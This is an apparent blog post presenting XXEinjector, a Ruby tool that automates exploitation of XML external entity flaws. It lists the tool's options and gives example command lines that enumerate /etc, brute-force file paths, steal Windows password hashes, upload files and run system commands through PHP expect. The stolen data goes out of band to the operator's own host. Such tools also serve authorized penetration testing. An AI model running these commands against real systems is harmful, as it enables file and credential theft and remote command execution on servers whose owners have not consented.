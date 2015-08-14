XXEinjector - Tool for Automatic Exploitation of XXE Vulnerability Using Direct and Different Out of Band Methods
XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.
Options:
--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2) --file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt) --path Mandatory if enumerating directories - Path to enumerate. (--path=/etc) --brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt) --logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results. --rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3) --rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080) --oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher) --direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK) --cdata Improve direct exploitation with CDATA. Data is retrieved directly, however OOB is used to construct CDATA payload. Specify --cdata-xml to see how request should look like in this technique. --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) --phpfilter Use PHP filter to base64 encode target file before sending. --netdoc Use netdoc protocol instead of file (Java). --enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445) --hashes Steals Windows hash of the user that runs an application. --expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls) --upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt) --xslt Tests for XSLT injection. --ssl Use SSL. --proxy Proxy to use. (--proxy=127.0.0.1:8080) --httpport Set custom HTTP port. (--httpport=80) --ftpport Set custom FTP port. (--ftpport=21) --gopherport Set custom gopher port. (--gopherport=70) --jarport Set custom port for uploading files using jar. (--jarport=1337) --xsltport Set custom port for XSLT injection test. (--xsltport=1337) --test This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server. --urlencode URL encode injected DTD. This is default for URI. --nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like. --output Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt) --timeout Timeout for receiving file/directory content. (--timeout=20) --contimeout Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20) --fast Skip asking what to enumerate. Prone to false-positives. --verbose Show verbose messages.
Example Usage:
Enumerating /etc directory in HTTPS application: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl Enumerating /etc directory using gopher for OOB method: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher Second order exploitation: ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt Bruteforcing files using HTTP out of band method and netdoc protocol: ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc Enumerating using direct exploitation: ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK Enumerating unfiltered ports: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all Stealing Windows hashes: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes Uploading files using Java jar: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf Executing system commands using PHP expect: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls Testing for XSLT injection: ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt Log requests only: ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt
You might also like:
Post a Comment